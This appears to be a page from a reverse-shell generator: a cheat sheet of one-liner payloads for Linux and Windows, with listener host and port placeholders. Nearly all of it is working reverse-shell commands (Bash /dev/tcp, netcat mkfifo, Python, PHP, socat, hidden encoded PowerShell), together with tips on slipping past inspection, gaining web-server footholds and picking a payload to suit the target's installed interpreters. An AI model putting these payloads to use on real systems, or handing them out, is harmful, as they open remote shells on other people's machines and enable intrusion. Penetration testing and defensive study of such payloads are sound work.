Cheat sheet
One-liner reference
A printable scan of the payloads available in thegenerator. Replace LHOST andLPORT with your listener values — or let the generator substitute and encode them for you.
Linux / Unix
| Shell | Payload | Notes |
|---|---|---|
| Bash /dev/tcp | bash -i >& /dev/tcp/LHOST/LPORT 0>&1 | No external binary; needs Bash with /dev/tcp. |
| Bash 196 | 0<&196;exec 196<>/dev/tcp/LHOST/LPORT; bash <&196 >&196 2>&196 | Survives some restricted shells. |
| sh | sh -i >& /dev/tcp/LHOST/LPORT 0>&1 | POSIX fallback where Bash is absent. |
| nc -e | nc LHOST LPORT -e /bin/sh | Only on netcat built with -e support. |
| nc mkfifo | rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc LHOST LPORT >/tmp/f | Works without -e via named pipe. |
| ncat TLS | ncat --ssl LHOST LPORT -e /bin/bash | Encrypts the channel against inspection. |
| Python 3 | python3 -c 'import socket,os,pty;s=socket.socket();s.connect(("LHOST",LPORT));[os.dup2(s.fileno(),f) for f in(0,1,2)];pty.spawn("/bin/bash")' | Portable; spawns a PTY directly. |
| PHP | php -r '$sock=fsockopen("LHOST",LPORT);exec("/bin/sh -i <&3 >&3 2>&3");' | Great for web-server footholds. |
| Perl | perl -e 'use Socket;...exec("/bin/sh -i");' | Preinstalled on most Unix hosts. |
| Ruby | ruby -rsocket -e'spawn("sh",[:in,:out,:err]=>TCPSocket.new("LHOST",LPORT))' | Concise socket spawn. |
| awk | awk 'BEGIN{s="/inet/tcp/0/LHOST/LPORT";...}' /dev/null | Last-resort when little is installed. |
| socat PTY | socat TCP:LHOST:LPORT EXEC:'bash -li',pty,stderr,setsid,sigint,sane | Fully interactive TTY out of the box. |
Windows
| Shell | Payload | Notes |
|---|---|---|
| PowerShell TCPClient | powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('LHOST',LPORT);..." | The default Windows reverse shell. |
| PowerShell -enc | powershell -nop -w hidden -enc <UTF16LE-base64> | Use the Base64 toggle on the generator. |
| nc.exe | nc.exe LHOST LPORT -e cmd.exe | Requires nc.exe / ncat.exe on target. |
| Python 3 (Win) | python3 -c "import socket,subprocess,os;...Popen(['cmd.exe'],...)" | If Python is installed on the host. |
Pick by environment, not habit
The most reliable payload is the one whose interpreter already exists on the target. Enumerate first — which python3 bash nc socaton Linux, or check $PSVersionTable on Windows — then choose a matching one-liner.